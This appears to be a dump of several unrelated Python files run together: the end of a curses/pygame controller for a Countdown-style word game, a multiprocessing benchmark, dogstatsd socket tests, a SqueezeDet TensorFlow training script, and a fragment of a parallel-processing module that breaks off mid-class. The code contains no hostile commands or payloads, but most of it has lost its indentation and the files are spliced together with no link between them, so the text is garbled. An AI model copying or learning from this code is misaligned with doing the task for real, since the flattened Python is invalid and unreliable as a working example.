allowable_words.append(word);
allowable_words = filter(lambda x : len(x) >= maxlen, allowable_words);
if allowable_words == []:
dialogue_write(dialogue, "No words available from this selection.");
else:
num_words = 0;
maxes_str = "";
for word in allowable_words:
if num_words > 0:
maxes_str += ", ";
maxes_str += word;
num_words += 1;
dialogue_write(dialogue, "Maximum " + str(maxlen) + ": " + maxes_str);
return 0;
def letters_round(state, view, dialogue):
dialogue_write(dialogue, "Enter letters, then press ENTER.");
state.round_type = 'L';
state.letters_rack = "";
state.bottom_rack = "";
broadcast_state(state);
view.draw(state);
key = curses.ERR;
while key != ord('\n'):
key = dialogue.getch();
if key == curses.KEY_BACKSPACE or key == curses.erasechar():
if state.letters_rack != "":
state.letters_rack = state.letters_rack[:-1];
broadcast_state(state);
view.draw(state);
elif (key >= ord('A') and key <= ord('Z')) or (key >= ord('a') and key <= ord('z')):
letter = chr(key).upper();
if len(state.letters_rack) < 9:
state.letters_rack = state.letters_rack + letter;
broadcast_state(state);
view.draw(state);
return 0;
def set_match_info(state, view, dialogue):
title = dialogue_prompt(dialogue, "Title [" + state.title + "]? ");
if title != "":
state.title = title;
p1 = dialogue_prompt(dialogue, "Player 1 [" + state.p1 + "]? ");
if p1 != "":
state.p1 = p1;
p2 = dialogue_prompt(dialogue, "Player 2 [" + state.p2 + "]? ");
if p2 != "":
state.p2 = p2;
def set_score(state, view, dialogue, player):
if player == 1 or player == 2:
operation = 0;
if player == 1:
answer = dialogue_prompt(dialogue, state.p1 + "'s score (" + str(state.s1) + ")? ");
elif player == 2:
answer = dialogue_prompt(dialogue, state.p2 + "'s score (" + str(state.s2) + ")? ");
if answer == "":
return;
if answer[0] == '+':
operation = 1;
answer = answer[1:];
elif answer[0] == '-':
operation = -1;
answer = answer[1:];
else:
operation = 0;
try:
score = int(answer);
except:
dialogue_write(dialogue, answer + " is not a number.");
return;
if player == 1:
if operation == -1:
state.s1 -= score;
elif operation == 0:
state.s1 = score;
else:
state.s1 += score;
else:
if operation == -1:
state.s2 -= score;
elif operation == 0:
state.s2 = score;
else:
state.s2 += score;
else:
answer = dialogue_prompt(dialogue, "Score (" + str(state.s1) + "-" + str(state.s2) + ")? ");
if answer == "":
return;
split_score = answer.split("-");
if len(split_score) == 2 and len(split_score[0]) > 0 and len(split_score[1]) > 0:
try:
score1 = int(split_score[0]);
score2 = int(split_score[1]);
state.s1 = score1;
state.s2 = score2;
except:
dialogue_write(dialogue, "Invalid score " + answer);
return;
else:
if answer[0] == '+':
operation = 1;
answer = answer[1:];
elif answer[0] == '-':
operation = -1;
answer = answer[1:];
else:
operation = 0;
try:
score = int(answer);
if operation == -1:
state.s1 -= score;
state.s2 -= score;
elif operation == 1:
state.s1 += score;
state.s2 += score;
else:
state.s1 = score;
state.s2 = score;
except:
dialogue_write(dialogue, "Invalid score " + answer);
return;
################################################################################
server = "localhost";
port = 12012;
client_role = False;
music_file_name = "";
state_file_name = os.environ["HOME"] + "/.livegame_state";
dict_file_name = "";
parser = argparse.ArgumentParser(description="Act as a client or server for a live co-event game.");
parser.add_argument("-s", action="store", dest="server", default="localhost");
parser.add_argument("-p", action="store", dest="port", default="12012");
parser.add_argument("-c", action="store_true", dest="client_role");
parser.add_argument("-m", action="store", dest="music_file_name", default="");
parser.add_argument("-d", action="store", dest="dict_file_name", default="");
parser.add_argument("-b", action="store", dest="background_image_file", default="");
parser.add_argument("-f", action="store", dest="font_file", default="");
opts = parser.parse_args();
server = opts.server;
port = int(opts.port);
client_role = opts.client_role;
music_file_name = opts.music_file_name;
dict_file_name = opts.dict_file_name;
background_image_file = opts.background_image_file;
font_file = opts.font_file;
dictionary = [];
if dict_file_name != "":
try:
dictionary = load_dictionary(dict_file_name);
except:
print "Couldn't open " + dict_file_name + "\n";
sys.exit(1);
if client_role:
screen_width = 800
screen_height = 600
music_paused = False;
resized = False;
title_bar = True;
pygame.mixer.pre_init(frequency=48000);
pygame.init();
if music_file_name != "":
pygame.mixer.init();
sound = pygame.mixer.Sound(music_file_name);
else:
sound = None;
if background_image_file:
background_image = pygame.image.load(background_image_file);
else:
background_image = None;
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
sock.connect((server, port));
screen = pygame.display.set_mode((screen_width, screen_height), pygame.RESIZABLE);
state = GameState();
view = GUILiveGameWindow(background_image);
view.draw(screen, state);
while True:
#clear_message(screen);
try:
msg_type = state.read_message(sock, 0.5);
except socket.error, e:
#display_message(screen, "LOST CONNECTION");
sock.close();
time.sleep(5);
sock = None;
while sock == None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
try:
                    sock.connect((server, port));
except socket.error:
sock.close();
sock = None;
time.sleep(5);
continue;
if msg_type == 1:
if sound != None:
sound.stop();
sound.play();
music_paused = False;
pygame.mixer.unpause();
elif msg_type == 2:
if sound != None:
if music_paused:
pygame.mixer.unpause();
else:
pygame.mixer.pause();
music_paused = not(music_paused);
elif msg_type == 3:
if sound != None:
pygame.mixer.unpause();
music_paused = False;
if resized:
flags = pygame.RESIZABLE;
if not title_bar:
flags |= pygame.NOFRAME;
screen = pygame.display.set_mode((screen_width, screen_height), flags);
view.rescale_background(screen);
resized = False;
if msg_type != -1:
view.draw(screen, state);
pygame.display.flip();
pygame.event.pump();
event = pygame.event.poll();
while event.type != pygame.NOEVENT:
if event.type == pygame.VIDEORESIZE:
screen_width = max(10, event.w)
screen_height = max(10, event.h)
resized = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_q:
sys.exit(0);
elif event.key == pygame.K_f:
title_bar = not(title_bar)
resized = True
event = pygame.event.poll()
else:
# Initialise ncurses
mainwin = curses.initscr();
curses.start_color();
curses.use_default_colors();
# Initialise colour pairs
for fg in range(0, 8):
for bg in range(0, 8):
if bg == 0:
curses.init_pair(bg * 8 + fg, fg, -1);
elif bg != 0 or fg != 0:
curses.init_pair(bg * 8 + fg, fg, bg);
(screen_height, screen_width) = mainwin.getmaxyx();
curses.noecho();
curses.cbreak();
key = curses.ERR;
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM);
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1);
sock.bind((server, port));
sock.listen(1);
gamewin = curses.newwin(12, screen_width, 0, 0);
helpwin = curses.newwin(4, screen_width, 12, 0);
dialogue = curses.newwin(screen_height - 17, screen_width, 17, 0);
dialogue.scrollok(True);
dialogue.idlok(True);
dialogue.keypad(1);
helpwin.addstr(0, 0, " L letters round 1/2 set player score S start clock");
helpwin.addstr(1, 0, " N numbers round B set both scores SPACE stop clock");
helpwin.addstr(2, 0, " C conundrum round D load dictionary T set title/players");
helpwin.addstr(3, 0, " SHIFT-C set conundrum W check word M show word maxes");
helpwin.refresh();
listener_thread = threading.Thread(target=listener_thread_fn, name="Listener Thread", args=(sock,dialogue));
listener_thread.daemon = True;
listener_thread.start();
state = GameState();
try:
state.load(state_file_name);
except:
pass;
view = CursesLiveGameWindow(gamewin);
view.draw(state);
except:
curses.endwin();
raise;
this_con_revealed = True;
prompt = True;
while True:
if prompt:
dialogue.addstr(">>> ");
dialogue.refresh();
prompt = False;
curses.halfdelay(1);
key = dialogue.getch();
curses.cbreak();
try:
start_clock_prompt = False;
if key == curses.ERR:
pass;
else:
prompt = True;
dialogue_write(dialogue, "");
if key == ord('c'):
if this_con_revealed:
set_conundrum(state, view, dialogue);
if conundrum_round(state, view, dialogue) == 0:
this_con_revealed = False;
elif key == ord('C'):
if set_conundrum(state, view, dialogue) == 0:
this_con_revealed = False;
elif key == ord('n'):
if numbers_round(state, view, dialogue) == 0:
start_clock_prompt = True;
elif key == ord('l'):
if letters_round(state, view, dialogue) == 0:
start_clock_prompt = True;
elif key == ord('k'):
answer = dialogue_prompt(dialogue, "Bottom rack? ");
state.bottom_rack = answer;
elif key == ord('s'):
if state.round_type == 'C':
if state.conundrum_top_state == 0:
state.reveal_conundrum_scramble();
dialogue_write(dialogue, "[SPACE] to stop clock, [R] to reveal answer.");
start_clock();
elif key == ord('i'):
if state.round_type == 'C':
state.reveal_conundrum_incorrect();
elif key == ord('r'):
if state.round_type == 'C':
state.reveal_conundrum_answer();
this_con_revealed = True;
elif key == ord('p') or key == ord(' '):
pause_clock();
if state.round_type == 'C':
dialogue_write(dialogue, "[R] to reveal correct answer, [SPACE] to resume/stop clock.");
elif key == ord('o'):
if state.round_type == 'C' and state.conundrum_bottom_state == 2:
state.conundrum_bottom_state = 0;
resume_clock();
elif key == ord('q'):
answer = dialogue_prompt(dialogue, "Are you sure you want to quit [Y/N]? ");
if len(answer) > 0 and answer[0].upper() == 'Y':
break;
elif key == ord('1'):
set_score(state, view, dialogue, 1);
elif key == ord('!'):
state.s1 += 10;
elif key == ord("\""):
state.s2 += 10;
elif key == ord('2'):
set_score(state, view, dialogue, 2);
elif key == ord('b'):
set_score(state, view, dialogue, 3);
elif key == ord('t'):
set_match_info(state, view, dialogue);
elif key == ord('d'):
answer = dialogue_prompt(dialogue, "Dictionary file [" + dict_file_name + "]? ");
if answer == "":
answer = dict_file_name;
try:
dictionary = load_dictionary(answer);
dict_file_name = answer;
dialogue_write(dialogue, str(len(dictionary)) + " words loaded from " + dict_file_name);
except:
dialogue_write(dialogue, "Couldn't load " + answer);
elif key == ord('w'):
if dictionary == []:
dialogue_write(dialogue, "Can't check words as no dictionary loaded.");
else:
answer = dialogue_prompt(dialogue, "Enter word to check: ");
if answer != "":
if answer.upper() in dictionary:
dialogue_write(dialogue, answer + " is VALID.");
else:
dialogue_write(dialogue, answer + " is INVALID.");
elif key == 5: # ^E
answer = dialogue_prompt(dialogue, "Reset game state, forgetting player names, scores and everything [y/N]? ");
if answer != "" and answer[0].upper() == 'Y':
state.set_state(GameState());
dialogue_write(dialogue, "Done.");
elif key == 24: # ^X
state.round_type = '';
state.letters_rack = "";
elif key == ord('m'):
if state.round_type == 'L':
show_letters_maxes(state, view, dialogue);
elif key < 256:
if chr(key) in string.printable:
keystr = chr(key);
elif key <= ord(' '):
keystr = "^" + chr(key + ord('A') - 1);
else:
keystr = "";
dialogue_write(dialogue, "Unknown command " + keystr);
broadcast_state(state);
state.save(state_file_name);
view.draw(state);
dialogue.cursyncup();
dialogue.refresh();
if start_clock_prompt:
answer = dialogue_prompt(dialogue, "Start clock [Y/n]? ");
if answer == "" or answer[0].upper() != 'N':
start_clock();
except curses.error:
key = curses.ERR;
except:
curses.endwin();
raise;
curses.endwin();
sys.exit(0);
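################################################################################
# Usage sketch (an assumption, not part of the original script): based on the
# argparse flags defined above, one way to run it would be a curses operator
# console acting as the server and a pygame display acting as a client. The
# script name "livegame.py" and the paths are hypothetical.
#
#   Operator console / server:  python livegame.py -p 12012 -d words.txt
#   Display client:             python livegame.py -c -s 192.168.0.10 -p 12012 -b background.png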
|
test.py
|
#
# Simple benchmarks for the multiprocessing package
#
# Copyright (c) 2006-2008, R Oudkerk
# All rights reserved.
#
import time, sys, multiprocessing, threading, queue, gc
if sys.platform == 'win32':
_timer = time.clock
else:
_timer = time.time
delta = 1
#### TEST_QUEUESPEED
def queuespeed_func(q, c, iterations):
a = '0' * 256
c.acquire()
c.notify()
c.release()
for i in range(iterations):
q.put(a)
q.put('STOP')
def test_queuespeed(Process, q, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = Process(target=queuespeed_func, args=(q, c, iterations))
c.acquire()
p.start()
c.wait()
c.release()
result = None
t = _timer()
while result != 'STOP':
result = q.get()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through the queue in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_PIPESPEED
def pipe_func(c, cond, iterations):
a = '0' * 256
cond.acquire()
cond.notify()
cond.release()
for i in range(iterations):
c.send(a)
c.send('STOP')
def test_pipespeed():
c, d = multiprocessing.Pipe()
cond = multiprocessing.Condition()
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
p = multiprocessing.Process(target=pipe_func,
args=(d, cond, iterations))
cond.acquire()
p.start()
cond.wait()
cond.release()
result = None
t = _timer()
while result != 'STOP':
result = c.recv()
elapsed = _timer() - t
p.join()
print(iterations, 'objects passed through connection in',elapsed,'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_SEQSPEED
def test_seqspeed(seq):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
a = seq[5]
elapsed = _timer()-t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_LOCK
def test_lockspeed(l):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
t = _timer()
for i in range(iterations):
l.acquire()
l.release()
elapsed = _timer()-t
print(iterations, 'iterations in', elapsed, 'seconds')
print('average number/sec:', iterations/elapsed)
#### TEST_CONDITION
def conditionspeed_func(c, N):
c.acquire()
c.notify()
for i in range(N):
c.wait()
c.notify()
c.release()
def test_conditionspeed(Process, c):
elapsed = 0
iterations = 1
while elapsed < delta:
iterations *= 2
c.acquire()
p = Process(target=conditionspeed_func, args=(c, iterations))
p.start()
c.wait()
t = _timer()
for i in range(iterations):
c.notify()
c.wait()
elapsed = _timer()-t
c.release()
p.join()
print(iterations * 2, 'waits in', elapsed, 'seconds')
print('average number/sec:', iterations * 2 / elapsed)
####
def test():
manager = multiprocessing.Manager()
gc.disable()
print('\n\t######## testing Queue.Queue\n')
test_queuespeed(threading.Thread, queue.Queue(),
threading.Condition())
print('\n\t######## testing multiprocessing.Queue\n')
test_queuespeed(multiprocessing.Process, multiprocessing.Queue(),
multiprocessing.Condition())
print('\n\t######## testing Queue managed by server process\n')
test_queuespeed(multiprocessing.Process, manager.Queue(),
manager.Condition())
print('\n\t######## testing multiprocessing.Pipe\n')
test_pipespeed()
print()
print('\n\t######## testing list\n')
test_seqspeed(range(10))
print('\n\t######## testing list managed by server process\n')
test_seqspeed(manager.list(range(10)))
print('\n\t######## testing Array("i", ..., lock=False)\n')
test_seqspeed(multiprocessing.Array('i', range(10), lock=False))
print('\n\t######## testing Array("i", ..., lock=True)\n')
test_seqspeed(multiprocessing.Array('i', range(10), lock=True))
print()
print('\n\t######## testing threading.Lock\n')
test_lockspeed(threading.Lock())
print('\n\t######## testing threading.RLock\n')
test_lockspeed(threading.RLock())
print('\n\t######## testing multiprocessing.Lock\n')
test_lockspeed(multiprocessing.Lock())
print('\n\t######## testing multiprocessing.RLock\n')
test_lockspeed(multiprocessing.RLock())
print('\n\t######## testing lock managed by server process\n')
test_lockspeed(manager.Lock())
print('\n\t######## testing rlock managed by server process\n')
test_lockspeed(manager.RLock())
print()
print('\n\t######## testing threading.Condition\n')
test_conditionspeed(threading.Thread, threading.Condition())
print('\n\t######## testing multiprocessing.Condition\n')
test_conditionspeed(multiprocessing.Process, multiprocessing.Condition())
print('\n\t######## testing condition managed by a server process\n')
test_conditionspeed(multiprocessing.Process, manager.Condition())
gc.enable()
if __name__ == '__main__':
multiprocessing.freeze_support()
test()
|
test_dogstatsd.py
|
# stdlib
from unittest import TestCase
import socket
import threading
import Queue
from collections import defaultdict
# 3p
import mock
# project
from dogstatsd import mapto_v6, get_socket_address
from dogstatsd import Server, init
from utils.net import IPV6_V6ONLY, IPPROTO_IPV6
class TestFunctions(TestCase):
def test_mapto_v6(self):
self.assertIsNone(mapto_v6('foo'))
self.assertIsNone(mapto_v6('192.'))
self.assertEqual(mapto_v6('192.168.1.1'), '::ffff:192.168.1.1')
self.assertEqual(mapto_v6('::1'), '::1')
self.assertEqual(mapto_v6('ff00::'), 'ff00::')
def test_get_socket_address(self):
with mock.patch('dogstatsd.socket.getaddrinfo') as getaddrinfo:
getaddrinfo.return_value = [(2, 2, 17, '', ('192.168.1.1', 80))]
self.assertEqual(get_socket_address('example.com', 80), ('::ffff:192.168.1.1', 80, 0, 0))
getaddrinfo.return_value = [(30, 2, 17, '', ('::1', 80, 0, 0))]
self.assertEqual(get_socket_address('example.com', 80), ('::1', 80, 0, 0))
self.assertIsNone(get_socket_address('foo', 80))
@mock.patch('dogstatsd.get_config')
@mock.patch('dogstatsd.Server')
def test_init(self, s, gc):
gc.return_value = defaultdict(str)
gc.return_value['non_local_traffic'] = True
gc.return_value['use_dogstatsd'] = True
init()
# if non_local_traffic was passed, use IPv4 wildcard
s.assert_called_once()
args, _ = s.call_args
self.assertEqual(args[1], '0.0.0.0')
class TestServer(TestCase):
@mock.patch('dogstatsd.get_socket_address')
def test_init(self, nh):
nh.return_value = 'foo'
s = Server(None, 'localhost', '1234')
        nh.assert_called_once_with('localhost', 1234)
self.assertEqual(s.sockaddr, 'foo')
self.assertIsNone(s.socket)
@mock.patch('dogstatsd.select')
def test_start(self, select):
select.select.side_effect = [KeyboardInterrupt, SystemExit]
s1 = Server(mock.MagicMock(), '::1', '1234')
s1.start()
self.assertEqual(s1.socket.family, socket.AF_INET6)
s2 = Server(mock.MagicMock(), '127.0.0.1', '2345')
s2.start()
self.assertEqual(s2.socket.family, socket.AF_INET6)
s2 = Server(mock.MagicMock(), 'foo', '80')
s2.start()
self.assertFalse(s2.running)
def _get_socket(self, addr, port):
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
sock.setsockopt(IPPROTO_IPV6, IPV6_V6ONLY, 0)
sock.bind((addr, port))
return sock
def test_connection_v4(self):
# start the server with a v4 mapped address
sock = self._get_socket('::ffff:127.0.0.1', 12345)
results = Queue.Queue()
def listen():
while True:
res = sock.recvfrom(1024)
results.put(res)
thread = threading.Thread(target=listen)
thread.daemon = True
thread.start()
# send packets with a v4 client
client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_sock.sendto('msg4', ('127.0.0.1', 12345))
msg = results.get(True, 1)
self.assertEqual(msg[0], 'msg4')
# send packets with a v6 client
client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
client_sock.sendto('msg6', ('::1', 12345))
self.assertRaises(Queue.Empty, results.get, True, 1)
def test_connection_v6(self):
# start the server with a v6 address
sock = self._get_socket('::1', 12345)
results = Queue.Queue()
def listen():
while True:
res = sock.recvfrom(1024)
results.put(res)
thread = threading.Thread(target=listen)
thread.daemon = True
thread.start()
# send packets with a v4 client
client_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_sock.sendto('msg4', ('127.0.0.1', 12345))
self.assertRaises(Queue.Empty, results.get, True, 1)
# send packets with a v6 client
client_sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
client_sock.sendto('msg6', ('::1', 12345))
msg = results.get(True, 1)
self.assertEqual(msg[0], 'msg6')
|
train.py
|
# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016
"""Train"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import cv2
from datetime import datetime
import os.path
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
import threading
from .config import *
from .dataset import pascal_voc, kitti
from .utils.util import sparse_to_dense, bgr_to_rgb, bbox_transform
from .nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('year', '2007',
"""VOC challenge year. 2007 or 2012"""
"""Only used for Pascal VOC dataset""")
tf.app.flags.DEFINE_string('train_dir', '/tmp/bichen/logs/squeezeDet/train',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'squeezeDet',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 10,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 1000,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
def _draw_box(im, box_list, label_list, color=(0,255,0), cdict=None, form='center'):
assert form == 'center' or form == 'diagonal', \
'bounding box format not accepted: {}.'.format(form)
for bbox, label in zip(box_list, label_list):
if form == 'center':
bbox = bbox_transform(bbox)
xmin, ymin, xmax, ymax = [int(b) for b in bbox]
l = label.split(':')[0] # text before "CLASS: (PROB)"
if cdict and l in cdict:
c = cdict[l]
else:
c = color
# draw box
cv2.rectangle(im, (xmin, ymin), (xmax, ymax), c, 1)
# draw label
font = cv2.FONT_HERSHEY_SIMPLEX
cv2.putText(im, label, (xmin, ymax), font, 0.3, c, 1)
def _viz_prediction_result(model, images, bboxes, labels, batch_det_bbox,
batch_det_class, batch_det_prob):
mc = model.mc
for i in range(len(images)):
# draw ground truth
_draw_box(
images[i], bboxes[i],
[mc.CLASS_NAMES[idx] for idx in labels[i]],
(0, 255, 0))
# draw prediction
det_bbox, det_prob, det_class = model.filter_prediction(
batch_det_bbox[i], batch_det_prob[i], batch_det_class[i])
keep_idx = [idx for idx in range(len(det_prob)) \
if det_prob[idx] > mc.PLOT_PROB_THRESH]
det_bbox = [det_bbox[idx] for idx in keep_idx]
det_prob = [det_prob[idx] for idx in keep_idx]
det_class = [det_class[idx] for idx in keep_idx]
_draw_box(
images[i], det_bbox,
[mc.CLASS_NAMES[idx]+': (%.2f)'% prob \
for idx, prob in zip(det_class, det_prob)],
(0, 0, 255))
def train():
"""Train SqueezeDet model"""
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default():
assert FLAGS.net == 'vgg16' or FLAGS.net == 'resnet50' \
or FLAGS.net == 'squeezeDet' or FLAGS.net == 'squeezeDet+', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'vgg16':
mc = kitti_vgg16_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = VGG16ConvDet(mc)
elif FLAGS.net == 'resnet50':
mc = kitti_res50_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = ResNet50ConvDet(mc)
elif FLAGS.net == 'squeezeDet':
mc = kitti_squeezeDet_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeDet(mc)
elif FLAGS.net == 'squeezeDet+':
mc = kitti_squeezeDetPlus_config()
mc.IS_TRAINING = True
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeDetPlus(mc)
imdb = kitti(FLAGS.image_set, FLAGS.data_path, mc)
# save model size, flops, activations by layers
with open(os.path.join(FLAGS.train_dir, 'model_metrics.txt'), 'w') as f:
f.write('Number of parameter by layer:\n')
count = 0
for c in model.model_size_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nActivation size by layer:\n')
for c in model.activation_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nNumber of flops by layer:\n')
for c in model.flop_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
f.close()
print('Model statistics saved to {}.'.format(
os.path.join(FLAGS.train_dir, 'model_metrics.txt')))
def _load_data(load_to_placeholder=True):
# read batch input
image_per_batch, label_per_batch, box_delta_per_batch, aidx_per_batch, \
bbox_per_batch = imdb.read_batch()
label_indices, bbox_indices, box_delta_values, mask_indices, box_values, \
= [], [], [], [], []
aidx_set = set()
num_discarded_labels = 0
num_labels = 0
for i in range(len(label_per_batch)): # batch_size
for j in range(len(label_per_batch[i])): # number of annotations
num_labels += 1
if (i, aidx_per_batch[i][j]) not in aidx_set:
aidx_set.add((i, aidx_per_batch[i][j]))
label_indices.append(
[i, aidx_per_batch[i][j], label_per_batch[i][j]])
mask_indices.append([i, aidx_per_batch[i][j]])
bbox_indices.extend(
[[i, aidx_per_batch[i][j], k] for k in range(4)])
box_delta_values.extend(box_delta_per_batch[i][j])
box_values.extend(bbox_per_batch[i][j])
else:
num_discarded_labels += 1
if mc.DEBUG_MODE:
print('Warning: Discarded {}/({}) labels that are assigned to the same '
'anchor'.format(num_discarded_labels, num_labels))
if load_to_placeholder:
image_input = model.ph_image_input
input_mask = model.ph_input_mask
box_delta_input = model.ph_box_delta_input
box_input = model.ph_box_input
labels = model.ph_labels
else:
image_input = model.image_input
input_mask = model.input_mask
box_delta_input = model.box_delta_input
box_input = model.box_input
labels = model.labels
feed_dict = {
image_input: image_per_batch,
input_mask: np.reshape(
sparse_to_dense(
mask_indices, [mc.BATCH_SIZE, mc.ANCHORS],
[1.0]*len(mask_indices)),
[mc.BATCH_SIZE, mc.ANCHORS, 1]),
box_delta_input: sparse_to_dense(
bbox_indices, [mc.BATCH_SIZE, mc.ANCHORS, 4],
box_delta_values),
box_input: sparse_to_dense(
bbox_indices, [mc.BATCH_SIZE, mc.ANCHORS, 4],
box_values),
labels: sparse_to_dense(
label_indices,
[mc.BATCH_SIZE, mc.ANCHORS, mc.CLASSES],
[1.0]*len(label_indices)),
}
return feed_dict, image_per_batch, label_per_batch, bbox_per_batch
def _enqueue(sess, coord):
try:
while not coord.should_stop():
feed_dict, _, _, _ = _load_data()
sess.run(model.enqueue_op, feed_dict=feed_dict)
if mc.DEBUG_MODE:
print("added to the queue")
if mc.DEBUG_MODE:
print("Finished enqueue")
except (Exception) as e:
coord.request_stop(e)
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
saver = tf.train.Saver(tf.global_variables())
summary_op = tf.summary.merge_all()
    init = tf.global_variables_initializer()
    sess.run(init)
    # Restore after initialization so a checkpoint, if present, is not
    # overwritten by the freshly initialized variables.
    ckpt = tf.train.get_checkpoint_state(FLAGS.train_dir)
    if ckpt and ckpt.model_checkpoint_path:
      saver.restore(sess, ckpt.model_checkpoint_path)
    summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
coord = tf.train.Coordinator()
if mc.NUM_THREAD > 0:
enq_threads = []
for _ in range(mc.NUM_THREAD):
enq_thread = threading.Thread(target=_enqueue, args=[sess, coord])
# enq_thread.isDaemon()
enq_thread.start()
enq_threads.append(enq_thread)
threads = tf.train.start_queue_runners(coord=coord, sess=sess)
run_options = tf.RunOptions(timeout_in_ms=60000)
# try:
for step in range(FLAGS.max_steps):
if coord.should_stop():
sess.run(model.FIFOQueue.close(cancel_pending_enqueues=True))
coord.request_stop()
coord.join(threads)
break
start_time = time.time()
if step % FLAGS.summary_step == 0:
feed_dict, image_per_batch, label_per_batch, bbox_per_batch = \
_load_data(load_to_placeholder=False)
op_list = [
model.train_op, model.loss, summary_op, model.det_boxes,
model.det_probs, model.det_class, model.conf_loss,
model.bbox_loss, model.class_loss
]
_, loss_value, summary_str, det_boxes, det_probs, det_class, \
conf_loss, bbox_loss, class_loss = sess.run(
op_list, feed_dict=feed_dict)
_viz_prediction_result(
model, image_per_batch, bbox_per_batch, label_per_batch, det_boxes,
det_class, det_probs)
image_per_batch = bgr_to_rgb(image_per_batch)
viz_summary = sess.run(
model.viz_op, feed_dict={model.image_to_show: image_per_batch})
summary_writer.add_summary(summary_str, step)
summary_writer.add_summary(viz_summary, step)
summary_writer.flush()
print('conf_loss: {}, bbox_loss: {}, class_loss: {}'.
format(conf_loss, bbox_loss, class_loss))
else:
if mc.NUM_THREAD > 0:
_, loss_value, conf_loss, bbox_loss, class_loss = sess.run(
[model.train_op, model.loss, model.conf_loss, model.bbox_loss,
model.class_loss], options=run_options)
else:
feed_dict, _, _, _ = _load_data(load_to_placeholder=False)
_, loss_value, conf_loss, bbox_loss, class_loss = sess.run(
[model.train_op, model.loss, model.conf_loss, model.bbox_loss,
model.class_loss], feed_dict=feed_dict)
duration = time.time() - start_time
assert not np.isnan(loss_value), \
'Model diverged. Total loss: {}, conf_loss: {}, bbox_loss: {}, ' \
'class_loss: {}'.format(loss_value, conf_loss, bbox_loss, class_loss)
if step % 10 == 0:
num_images_per_step = mc.BATCH_SIZE
images_per_sec = num_images_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f images/sec; %.3f '
'sec/batch)')
print(format_str % (datetime.now(), step, loss_value,
images_per_sec, sec_per_batch))
sys.stdout.flush()
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or (step + 1) == FLAGS.max_steps:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
# except Exception, e:
# coord.request_stop(e)
# finally:
# coord.request_stop()
# coord.join(threads)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
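# A hypothetical invocation sketch (not part of the original file): the flags
# defined above suggest a command line along these lines; the package entry
# point and the paths are assumptions.
#
#   python -m src.train --dataset=KITTI --data_path=./data/KITTI \
#       --image_set=train --net=squeezeDet \
#       --pretrained_model_path=./data/model_checkpoints/squeezenet_v1.1.pkl \
#       --train_dir=/tmp/logs/squeezeDet/train --max_steps=100000 --gpu=0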
|
parallel.py
|
import logging
import multiprocessing
import threading
from dataclasses import dataclass
from typing import TypeVar, Generic, List, Tuple, Callable
from glimmer.processing import Topology, Operator, Source, Sink, Node, Executable, Environment
Result = TypeVar("Result")
Out = TypeVar("Out")
@dataclass
class ParallelTopology(Topology, Generic[Result, Out]):
__POISON__ = 'POISON'
def __init__(self, sources, operators, sinks):
self.raw_sources = sources
self.raw_operators = operators
